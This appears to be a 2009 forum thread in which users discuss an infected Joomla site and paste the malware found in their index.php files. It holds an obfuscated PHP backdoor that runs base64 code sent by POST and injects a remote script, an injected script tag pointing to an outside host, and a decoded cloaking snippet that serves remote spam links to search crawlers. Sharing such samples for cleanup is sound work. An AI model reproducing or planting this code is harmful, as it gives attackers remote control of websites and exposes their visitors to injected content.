12-18-2009, 03:30 PM
(12-18-2009, 12:23 PM)spiro_dt Wrote: hmm probably u have something bad written on the index file , once my server was having this kind of problems , and from the support center said that it was infected with virus .and they have cleaned it.. try scan your pc , server or whatever u have
I ve had this line on all my index.php files
this maybe will helpCode:<?php eval(base64_decode('aWYoIWlzc2V0KCRwNzIxKSl7ZnVuY3Rpb24gcDcyKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMM0IxYzJGMllYSnphWFI1TG05eVp5NXBiaTloWkcxcGMzTnBiMjV1YjNScFkyVXZaR0ZwY25rdWNHaHdJRDQ4TDNOamNtbHdkRDQ9JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkkcy49JGE7cmV0dXJuICRzO31mdW5jdGlvbiBwNzIyKCRhLCRiLCRjLCRkKXtnbG9iYWwgJHA3MjE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJHA3MjEpKWNhbGxfdXNlcl9mdW5jKCRwNzIxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpIGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J3A3MicpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSAkc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdwNzInKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kcDcybD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcigncDcyMicpKSE9J3A3MjInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?><?php
class JConfig {
<?php eval(base64_decode())?>
http://forum.joomla.org/viewtopic.php?f=432&p=1891699
<script src=http://prospekt.org/banners/vacancies.php ></script>
and this how the decrypted code looked like
Code:if(strstr($_SERVER['HTTP_USER_AGENT'],'Slurp')||strstr($_SERVER['HTTP_USER_AGENT'],'msnbot')||strstr($_SERVER['HTTP_USER_AGENT'],'Googlebot')){$content=file_get_contents('http://97.74.217.181/links.php');if($content!==false){echo($content);}}
XAMPP is better